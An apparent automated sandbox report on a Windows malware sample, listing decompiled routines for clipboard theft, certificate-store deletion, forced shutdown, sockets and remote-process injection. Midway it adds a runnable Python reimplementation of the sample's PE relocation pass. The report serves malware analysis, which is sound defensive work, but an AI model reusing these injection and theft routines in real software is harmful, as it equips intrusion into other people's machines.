    0x0040dbc7
    0x0040dbd6
    0x0040dbd8
    0x0040dbda
    0x0040dbe9
    0x0040dbee
    0x0040dbee
    0x0040dbf1
    0x0040dbf7
    0x0040ddd0
    0x0040ddd6
    0x0040dde2
    0x0040dde6
    0x0040de07
    0x0040de09
    0x0040de11
    0x0040de19
    0x0040de21
    0x0040de27
    0x0040de32
    0x00000000
    0x00000000
    0x00000000
    0x0040dde8
    0x0040dde8
    0x0040ddf3
    0x0040ddf9
    0x0040ddff
    0x00000000
    0x0040dde8
    0x0040dbfd
    0x0040dc00
    0x0040dc03
    0x0040dc05
    0x00000000
    0x00000000
    0x0040dc0b
    0x0040dc1d
    0x0040dc1f
    0x0040dc25
    0x00000000
    0x00000000
    0x0040dc2c
    0x0040dc32
    0x0040dc4f
    0x0040dc54
    0x0040dc56
    0x0040ddc9
    0x0040ddcb
    0x00000000
    0x0040ddcb
    0x0040dc6d
    0x0040dc70
    0x0040dc79
    0x00000000
    0x00000000
    0x0040dc89
    0x0040dc8e
    0x0040dc93
    0x00000000
    0x00000000
    0x0040dc9e
    0x0040dc9e
    0x0040dca2
    0x0040dca5
    0x0040dcaf
    0x00000000
    0x00000000
    0x0040dcc9
    0x0040dccb
    0x0040dcce
    0x0040ddb7
    0x0040ddbb
    0x0040ddbf
    0x0040ddbf
    0x0040ddc0
    0x0040ddc1
    0x00000000
    0x0040ddc1
    0x0040dcdb
    0x0040dcdc
    0x0040dcde
    0x0040dce3
    0x0040dce6
    0x0040de35
    0x0040de35
    0x00000000
    0x0040de35
    0x0040dcf0
    0x0040dcf6
    0x0040dcf9
    0x0040dd03
    0x0040dd14
    0x0040dd16
    0x0040dd1a
    0x0040dd1b
    0x0040dd1d
    0x00000000
    0x00000000
    0x0040dd23
    0x0040dd24
    0x0040dd26
    0x0040dd2b
    0x0040dd2d
    0x0040de3c
    0x00000000
    0x0040de3c
    0x0040dd33
    0x0040dd36
    0x0040dd3a
    0x0040dd45
    0x0040dd4b
    0x0040dd4f
    0x0040dd54
    0x0040dd59
    0x0040dd72
    0x0040dd7c
    0x0040dd7f
    0x0040dd7f
    0x0040dd7c
    0x0040dd8a
    0x0040dd8a
    0x0040dd92
    0x0040dda1
    0x0040dda6
    0x0040ddab
    0x00000000
    0x0040ddb1
    0x00000000
    0x0040ddb1
    0x0040ddab
    0x0040dd05
    0x00000000
    0x0040dd05
    0x0040ddc6
    0x00000000
    0x0040ddc6
    0x0040dbdc
    0x00000000
    0x0040dbdc
    0x0040dbc9
    0x00000000

    APIs
    • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0040DBC3
    • lstrcmpiA.KERNEL32(?,vnc), ref: 0040DBD6
    • CloseHandle.KERNEL32(?), ref: 0040DDF3
      • Part of subcall function 0041A464: SetLastError.KERNEL32(0000009B,0040F382,00000000,0040FA7D,00000000,00422A90,00000000,00000104,74B5F560,00000000), ref: 0041A46E
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
    • String ID: socks$vnc
    • API String ID: 3305036421-270151703
    • Opcode ID: 75b8e4c2b2d7933f3109896334b3120045d80d9b6f01cb261bd7d8df81ac878c
    • Instruction ID: fb4c9373c4ca911734dbe7eb4aa62743471319ea5aaa63728d05c18a29072b1b
    • Opcode Fuzzy Hash: 75b8e4c2b2d7933f3109896334b3120045d80d9b6f01cb261bd7d8df81ac878c
    • Instruction Fuzzy Hash: CF71D230C00219AACF11AFA1C841BFE7B75AF05314F1540ABF854BB2D2D77C9E859BA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00405EC6(void* _a4) {
    				signed int _t11;
    				void* _t21;
    				void* _t23;
    				void* _t24;
    				int _t25;
    
    				_t25 = _a4;
    				_t23 = GetClipboardData(_t25);
    				_a4 = _t23;
    				if(E0040EEE1() == 0) {
    					return _t23;
    				}
    				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
    					L20:
    					return _a4;
    				} else {
    					_t21 = GlobalLock(_t23);
    					if(_t21 == 0) {
    						L19:
    						goto L20;
    					}
    					_t11 = _t25 - 1;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(0);
    						L12:
    						_t24 = E004165E8(_t11 | 0xffffffff);
    						L15:
    						if(_t24 != 0) {
    							EnterCriticalSection(0x4228a8);
    							E00405BC3(0x401624);
    							E00405BC3(_t24);
    							LeaveCriticalSection(0x4228a8);
    							if(_t24 != _t21) {
    								E004163A8(_t24);
    							}
    						}
    						GlobalUnlock(_a4);
    						goto L19;
    					}
    					_t11 = _t11 - 6;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(1);
    						goto L12;
    					}
    					if(_t11 != 6) {
    						_t24 = _a4;
    					} else {
    						_t24 = _t21;
    					}
    					goto L15;
    				}
    			}








    0x00405eca
    0x00405ed5
    0x00405ed7
    0x00405ee1
    0x00000000
    0x00405ee3
    0x00405eec
    0x00405f74
    0x00000000
    0x00405f01
    0x00405f09
    0x00405f0d
    0x00405f73
    0x00000000
    0x00405f73
    0x00405f11
    0x00405f12
    0x00405f31
    0x00405f32
    0x00405f25
    0x00405f2d
    0x00405f39
    0x00405f3b
    0x00405f43
    0x00405f4e
    0x00405f54
    0x00405f5a
    0x00405f62
    0x00405f65
    0x00405f65
    0x00405f62
    0x00405f6d
    0x00000000
    0x00405f6d
    0x00405f14
    0x00405f17
    0x00405f22
    0x00405f23
    0x00000000
    0x00405f23
    0x00405f1c
    0x00405f36
    0x00405f1e
    0x00405f1e
    0x00405f1e
    0x00000000
    0x00405f1c

    APIs
    • GetClipboardData.USER32 ref: 00405ECF
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • GlobalLock.KERNEL32 ref: 00405F03
    • EnterCriticalSection.KERNEL32(004228A8,00000000,00000000), ref: 00405F43
    • LeaveCriticalSection.KERNEL32(004228A8,00000000,00401624), ref: 00405F5A
    • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00405F6D
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
    • String ID:
    • API String ID: 1109978993-0
    • Opcode ID: d9457119fbd82276ab49fffd48c9c19474405445a595201c8cdfe8a140313d75
    • Instruction ID: 3c0c88fe93c005b1b8921d48fd1901fb2157e9d1ca5dd755b989713102c23241
    • Opcode Fuzzy Hash: d9457119fbd82276ab49fffd48c9c19474405445a595201c8cdfe8a140313d75
    • Instruction Fuzzy Hash: 4911E332504A07BBCB112B299D88DAF3668DB45350B19013BF905F73E0CA7DCC429EAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BA18(WCHAR* __ecx, void* __eflags) {
    				struct _WIN32_FIND_DATAW _v596;
    				short _v1116;
    				WCHAR* _t38;
    				void* _t42;
    
    				_t38 = __ecx;
    				if(E0041BC2F("*",  &_v1116, __ecx) == 0) {
    					L9:
    					SetFileAttributesW(_t38, 0x80);
    					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
    				}
    				_t42 = FindFirstFileW( &_v1116,  &_v596);
    				if(_t42 == 0xffffffff) {
    					goto L9;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E0041B834( &(_v596.cFileName)) == 0 && E0041BC2F( &(_v596.cFileName),  &_v1116, _t38) != 0) {
    						_t51 = _v596.dwFileAttributes & 0x00000010;
    						if((_v596.dwFileAttributes & 0x00000010) == 0) {
    							E0041B705( &_v1116);
    						} else {
    							E0041BA18( &_v1116, _t51);
    						}
    					}
    				} while (FindNextFileW(_t42,  &_v596) != 0);
    				FindClose(_t42);
    				goto L9;
    			}







    0x0041ba26
    0x0041ba3a
    0x0041bab5
    0x0041babb
    0x0041bad2
    0x0041bad2
    0x0041ba4f
    0x0041ba54
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041ba56
    0x0041ba56
    0x0041ba64
    0x0041ba7c
    0x0041ba84
    0x0041ba96
    0x0041ba86
    0x0041ba8a
    0x0041ba8a
    0x0041ba84
    0x0041baaa
    0x0041baaf
    0x00000000

    APIs
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041BA49
    • FindNextFileW.KERNEL32(00000000,?), ref: 0041BAA4
    • FindClose.KERNEL32(00000000), ref: 0041BAAF
    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 0041BABB
    • RemoveDirectoryW.KERNEL32(?), ref: 0041BAC2
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
    • String ID:
    • API String ID: 765042924-0
    • Opcode ID: e29bc09c258a5e39609c2bfe3efe158e6a4bbfbb5751287e21b14db4ba775edf
    • Instruction ID: d844e3a2af0b87982aab8298919512a59de90ee23d43bc9ee230f70c964b2782
    • Opcode Fuzzy Hash: e29bc09c258a5e39609c2bfe3efe158e6a4bbfbb5751287e21b14db4ba775edf
    • Instruction Fuzzy Hash: FD11AB310042096AC320EBA4DD4DBEB73ECDF85354F40862FF9A5D21A1EB78958587DE
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00404B84), ref: 0041D771
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0041D78A
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,0040F4E4), ref: 0041D795
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041D79D
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 0041D7A9
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
    • String ID:
    • API String ID: 1842529175-0
    • Opcode ID: b4e056287e8b6bcd6c01052db8080cabbd92a37fd3fb8cdc41b6b165a8cd1c4c
    • Instruction ID: bc84a860cf61b9e342dc502e179dbe795be430546e5662426c281594c338d1de
    • Opcode Fuzzy Hash: b4e056287e8b6bcd6c01052db8080cabbd92a37fd3fb8cdc41b6b165a8cd1c4c
    • Instruction Fuzzy Hash: 90F0E57268121167C71117256D48FF7BB6C9F82BB1B140127FD94E32A09E38C880857C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004120CF(void* __ebx, void* __ecx) {
    				signed int _v124;
    				signed char _t12;
    				unsigned int _t15;
    
    				_t12 =  *0x422b94; // 0x0
    				if((_t12 & 0x00000010) == 0) {
    					__eflags = _t12 & 0x00000008;
    					if(__eflags != 0) {
    						E004098DC(__ebx, __ecx, __eflags);
    						_t12 =  *0x422b94; // 0x0
    					}
    					__eflags = _t12 & 0x00000003;
    					if((_t12 & 0x00000003) == 0) {
    						__eflags = _t12 & 0x00000004;
    						if((_t12 & 0x00000004) != 0) {
    							goto L8;
    						}
    						goto L9;
    					} else {
    						E00417A74(L"SeShutdownPrivilege");
    						_t15 =  *0x422b94; // 0x0
    						__eflags = 0;
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
    						return 0;
    					}
    				} else {
    					_t12 = E00413F4A( &_v124);
    					if(_t12 != 0) {
    						_v124 = _v124 | 0x00000020;
    						 *0x422b98 =  *0x422b98 | 0x00000010;
    						E00413FA2( &_v124);
    						L8:
    						return ExitWindowsEx(0x14, 0x80000000);
    					}
    					L9:
    					return _t12;
    				}
    			}






    0x004120d2
    0x004120dc
    0x00412101
    0x00412103
    0x00412105
    0x0041210a
    0x0041210a
    0x0041210f
    0x00412111
    0x0041213c
    0x0041213e
    0x00000000
    0x00000000
    0x00000000
    0x00412113
    0x00412118
    0x0041211d
    0x0041212f
    0x00412134
    0x0041213b
    0x0041213b
    0x004120de
    0x004120e2
    0x004120e9
    0x004120eb
    0x004120ef
    0x004120fa
    0x00412140
    0x00000000
    0x00412147
    0x0041214e
    0x0041214e
    0x0041214e

    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 00412134
      • Part of subcall function 00413F4A: CreateMutexW.KERNEL32(00422BD0,00000000,00423148,?,?,00413D59,?,?,?,743C152E,00000002), ref: 00413F70
    • ExitWindowsEx.USER32(00000014,80000000), ref: 00412147
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CreateExitInitiateMutexShutdownSystemWindows
    • String ID: $SeShutdownPrivilege
    • API String ID: 3829579691-2253681161
    • Opcode ID: 3616fc0272bce4acf371547f81cb90875d0a51c363d754f4b559825dd47428c9
    • Instruction ID: 9f8ef0cc0cf88bbbc013522f64a228bd4d838c3b7983664f83a6514e82aab31a
    • Opcode Fuzzy Hash: 3616fc0272bce4acf371547f81cb90875d0a51c363d754f4b559825dd47428c9
    • Instruction Fuzzy Hash: 0CF08B3160025479FE24EF749F06BEA3B6C8B01748F540026EA95E2173D6A995928B2C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041AD03(void* __eax, void* _a4) {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				void* _t37;
    				void* _t42;
    				intOrPtr* _t43;
    				int _t44;
    				long _t46;
    				void* _t47;
    				SIZE_T* _t48;
    				signed int _t50;
    				void* _t52;
    				void* _t54;
    				void* _t55;
    				void* _t60;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				unsigned int _t64;
    
    				_t55 = __eax;
    				_t1 = _t55 + 0x3c; // 0xd8
    				_t60 =  *_t1 + __eax;
    				_t46 =  *(_t60 + 0x50);
    				_v24 = _t46;
    				_v5 = 0;
    				if(IsBadReadPtr(__eax, _t46) == 0) {
    					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
    					_v12 = _t37;
    					__eflags = _t37;
    					if(__eflags == 0) {
    						L17:
    						return _v12;
    					}
    					_t47 = E004163FB(__eflags, _t55, _t46);
    					_t48 = 0;
    					__eflags = _t47;
    					if(_t47 == 0) {
    						L16:
    						VirtualFreeEx(_a4, _v12, 0, 0x8000);
    						_t32 =  &_v12;
    						 *_t32 = _v12 & 0x00000000;
    						__eflags =  *_t32;
    						goto L17;
    					}
    					__eflags =  *(_t60 + 0xa4);
    					if( *(_t60 + 0xa4) <= 0) {
    						L15:
    						E004163A8(_t47);
    						__eflags = _v5;
    						if(_v5 != 0) {
    							goto L17;
    						}
    						goto L16;
    					}
    					_t42 =  *(_t60 + 0xa0);
    					__eflags = _t42;
    					if(_t42 <= 0) {
    						goto L15;
    					}
    					_t61 =  *((intOrPtr*)(_t60 + 0x34));
    					_t54 = _v12 - _t61;
    					_v20 = _t55 - _t61;
    					_t43 = _t42 + _t47;
    					while(1) {
    						__eflags =  *_t43 - _t48;
    						if( *_t43 == _t48) {
    							break;
    						}
    						_t62 =  *((intOrPtr*)(_t43 + 4));
    						__eflags = _t62 - 8;
    						if(_t62 < 8) {
    							L12:
    							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
    							_t48 = 0;
    							__eflags = 0;
    							continue;
    						}
    						_t64 = _t62 + 0xfffffff8 >> 1;
    						__eflags = _t64;
    						_v16 = _t48;
    						if(_t64 == 0) {
    							goto L12;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
    							__eflags = _t50;
    							if(_t50 != 0) {
    								_t52 = (_t50 & 0x00000fff) +  *_t43;
    								_t19 = _t52 + _t47;
    								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
    								__eflags =  *_t19;
    							}
    							_v16 = _v16 + 1;
    							__eflags = _v16 - _t64;
    						} while (_v16 < _t64);
    						goto L12;
    					}
    					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
    					__eflags = _t44;
    					_t28 =  &_v5;
    					 *_t28 = _t44 != 0;
    					__eflags =  *_t28;
    					goto L15;
    				}
    				return 0;
    			}

    APIs
    • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0041AD1F
    • VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 0041AD3D
    • WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,00400000,00000000,00400000,?,?,74B5F560,00000000), ref: 0041ADCF
    • VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,00400000,?,?,74B5F560,00000000), ref: 0041ADF4
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Virtual$AllocFreeMemoryProcessReadWrite
    • String ID:
    • API String ID: 1273498236-0
    • Opcode ID: a5611ddfb37f94985a099c83305b8f10012e03d75221c0046daa0072a3f7f8cb
    • Instruction ID: 402d3be93969db2a5c4ddcbfbada0398a8ed50ac041230525ca6a3eda3c02996
    • Opcode Fuzzy Hash: a5611ddfb37f94985a099c83305b8f10012e03d75221c0046daa0072a3f7f8cb
    • Instruction Fuzzy Hash: D431F571A01609AFCF108F64CD80BEFBBB6EF05706F05406AE501B7690C7749D91CB59
    Uniqueness

    Uniqueness Score: -1.00%

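The routine E0041AD03 above checks that its own mapped image is readable (IsBadReadPtr over SizeOfImage), reserves SizeOfImage bytes of RWX memory in the target with VirtualAllocEx, works from a buffer returned by E004163FB, and, before WriteProcessMemory, walks the base relocation directory (NT headers + 0xa0/0xa4) adding the difference between the remote allocation and the current base to every pointer the table names. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox; it reimplements that relocation pass on a constructed minimal image so the loop can be run and checked offline. The image layout, the base addresses 0x400000 and 0x10000000, and the helper names are assumptions made for the example.

```python
import struct

# Header offsets used by E0041AD03 (relative to the IMAGE_NT_HEADERS32 start)
OPT_IMAGE_BASE = 0x34      # OptionalHeader.ImageBase
OPT_SIZE_OF_IMAGE = 0x50   # OptionalHeader.SizeOfImage
DIR_BASERELOC_RVA = 0xa0   # DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
DIR_BASERELOC_SIZE = 0xa4  # DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size
IMAGE_REL_BASED_HIGHLOW = 3


def u32_at(image, rva):
    """Little-endian DWORD at an RVA of an in-memory (section-aligned) image."""
    return struct.unpack_from("<I", image, rva)[0]


def build_constructed_image(image_base):
    """Constructed test image (assumption, not taken from the sample): DOS header,
    NT headers with only the fields the rebasing loop reads, a 'code' page at
    RVA 0x1000 holding two absolute pointers, and one IMAGE_BASE_RELOCATION
    block at RVA 0x2000 covering them plus an ABSOLUTE padding entry."""
    size_of_image = 0x3000
    img = bytearray(size_of_image)
    e_lfanew = 0x80
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3c, e_lfanew)
    nt = e_lfanew
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<I", img, nt + OPT_IMAGE_BASE, image_base)
    struct.pack_into("<I", img, nt + OPT_SIZE_OF_IMAGE, size_of_image)

    code_rva = 0x1000
    struct.pack_into("<I", img, code_rva + 0x10, image_base + 0x1234)
    struct.pack_into("<I", img, code_rva + 0x20, image_base + 0x2000)

    reloc_rva = 0x2000
    entries = [(IMAGE_REL_BASED_HIGHLOW << 12) | 0x10,
               (IMAGE_REL_BASED_HIGHLOW << 12) | 0x20,
               0]                                   # IMAGE_REL_BASED_ABSOLUTE padding
    block = struct.pack("<II", code_rva, 8 + 2 * len(entries))
    block += b"".join(struct.pack("<H", e) for e in entries)
    img[reloc_rva:reloc_rva + len(block)] = block
    struct.pack_into("<I", img, nt + DIR_BASERELOC_RVA, reloc_rva)
    struct.pack_into("<I", img, nt + DIR_BASERELOC_SIZE, len(block))
    return bytes(img)


def rebase_image(image, current_base, new_base):
    """Rebase a copy of an already-mapped image for a new load address, the way the
    loop between 0x41AD7B and 0x41ADC2 does before WriteProcessMemory:

      delta = new_base - current_base            (_t54 - _v20 in the listing)
      for every block, for every non-zero WORD entry:
          *(DWORD*)(block.VirtualAddress + (entry & 0xfff)) += delta

    As in the sample, the 4-bit relocation type is never examined, so every
    non-zero entry is applied as a 32-bit HIGHLOW fixup. Unlike the sample, a
    block whose SizeOfBlock is below 8 or that runs past the directory's stated
    size is rejected instead of being stepped over, so a malformed table cannot
    spin forever or patch outside the directory.
    Returns (rebased_image, number_of_fixups_applied)."""
    img = bytearray(image)
    nt = u32_at(img, 0x3c)
    reloc_rva, reloc_size = struct.unpack_from("<II", img, nt + DIR_BASERELOC_RVA)
    delta = (new_base - current_base) & 0xffffffff
    applied = 0
    if reloc_rva == 0 or reloc_size == 0:          # the (_t60 + 0xa0) / (_t60 + 0xa4) checks
        return bytes(img), applied
    pos, end = reloc_rva, reloc_rva + reloc_size
    while pos + 8 <= end:
        va, size = struct.unpack_from("<II", img, pos)
        if va == 0:                                 # terminator, as in the sample's while(1)
            break
        if size < 8 or pos + size > end:
            raise ValueError("malformed IMAGE_BASE_RELOCATION block at RVA 0x%x" % pos)
        for i in range((size - 8) >> 1):
            entry = struct.unpack_from("<H", img, pos + 8 + 2 * i)[0]
            if entry == 0:
                continue                            # ABSOLUTE padding entry is skipped
            target = va + (entry & 0xfff)
            struct.pack_into("<I", img, target, (u32_at(img, target) + delta) & 0xffffffff)
            applied += 1
        pos += size
    return bytes(img), applied


if __name__ == "__main__":
    original = build_constructed_image(0x400000)
    rebased, n = rebase_image(original, 0x400000, 0x10000000)
    print("fixups applied:", n)
    print("pointer at RVA 0x1010: 0x%08x -> 0x%08x"
          % (u32_at(original, 0x1010), u32_at(rebased, 0x1010)))
```

For a forensic re-implementation the two deviations matter: the sample's loop trusts SizeOfBlock blindly and ignores the relocation type, so a dumped image that was rebased by this code will have every non-zero entry treated as HIGHLOW, which is also why the listing masks only the low 12 bits of each entry.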
    C-Code - Quality: 100%
    			E00417A1D(intOrPtr _a4) {
    				intOrPtr _v20;
    				void* _v32;
    				signed int _t6;
    				signed int _t7;
    				int _t9;
    				int _t14;
    				void* _t15;
    
    				_t14 = 0;
    				_t6 = CreateToolhelp32Snapshot(4, 0);
    				_t15 = _t6;
    				_t7 = _t6 | 0xffffffff;
    				if(_t15 != _t7) {
    					_v32 = 0x1c;
    					_t9 = Thread32First(_t15,  &_v32);
    					while(_t9 != 0) {
    						if(_v20 == _a4) {
    							_t14 = _t14 + 1;
    						}
    						_t9 = Thread32Next(_t15,  &_v32);
    					}
    					CloseHandle(_t15);
    					return _t14;
    				}
    				return _t7;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00417A2A
    • Thread32First.KERNEL32 ref: 00417A45
    • Thread32Next.KERNEL32 ref: 00417A5B
    • CloseHandle.KERNEL32(00000000), ref: 00417A66
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: e8da23ea6f3dd5439e73b56ca6e084f1f8b3f236189e2dcef25cf17983a97b46
    • Instruction ID: 126fd09709233bea9ca4c72564499b8517d1fd1a8f9831c905bc5730e1b2e491
    • Opcode Fuzzy Hash: e8da23ea6f3dd5439e73b56ca6e084f1f8b3f236189e2dcef25cf17983a97b46
    • Instruction Fuzzy Hash: 60F08972504115ABD720AF65DC48DEF7BBCEF85790F000126FA12E2290D7389A85C6B9
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000001,00000006), ref: 004194F3
    • bind.WS2_32(00000000,?,-0000001D), ref: 00419513
    • listen.WS2_32(00000000,?), ref: 00419522
    • closesocket.WS2_32(00000000), ref: 0041952D
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: f78e8057b0f8f6fcbd244b8fe884aa12aa9d100737b826f61c904a8310dc2137
    • Instruction ID: 8a23dee8ff56d4025e5a9d097799e3dbd364c74613bbe6c8b332c128f9503776
    • Opcode Fuzzy Hash: f78e8057b0f8f6fcbd244b8fe884aa12aa9d100737b826f61c904a8310dc2137
    • Instruction Fuzzy Hash: 8CF0A73220010076D2211F39ED09A6F2AAA9BC17B0B040729F462E61E0E73888C2C524
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 004197D1
    • bind.WS2_32(00000000,00000017,-0000001D), ref: 004197F1
    • closesocket.WS2_32(00000000), ref: 004197FC
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: 44e594ebd3cfd45e0fa7b2e8d7497f330a8ee7e756eec3927565abca3bc1a630
    • Instruction ID: 62ab5973d68b1c46eea08d67a9270810fe4c09f3c6fccd014d350a6e7704d334
    • Opcode Fuzzy Hash: 44e594ebd3cfd45e0fa7b2e8d7497f330a8ee7e756eec3927565abca3bc1a630
    • Instruction Fuzzy Hash: A6E0483220051076D3202B39AD4EA6F25A99BC67717190725F572D71E1E77888C29134
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0040E447(char* __esi) {
    				void* _v40;
    				short _v46;
    				signed char _v48;
    				struct _OSVERSIONINFOW _v324;
    				void* _t13;
    				int _t16;
    				signed int _t20;
    				short _t24;
    				char* _t25;
    
    				_t25 = __esi;
    				E0041645B(_t13, __esi, 0, 6);
    				_v324.dwOSVersionInfoSize = 0x11c;
    				_t16 = GetVersionExW( &_v324);
    				if(_t16 != 0) {
    					__imp__GetNativeSystemInfo( &_v40);
    					 *__esi = E0040E371();
    					if(_v48 > 0xff || _v46 != 0) {
    						_t20 = 0;
    					} else {
    						_t20 = _v48 & 0x000000ff;
    					}
    					 *(_t25 + 1) = _t20;
    					asm("sbb eax, eax");
    					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
    					_t24 = _v40;
    					 *((short*)(_t25 + 4)) = _t24;
    					return _t24;
    				}
    				return _t16;
    			}

    APIs
    • GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 0040E46B
    • GetNativeSystemInfo.KERNEL32(?), ref: 0040E479
      • Part of subcall function 0040E371: GetVersionExW.KERNEL32(?,74B04EE0), ref: 0040E390
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
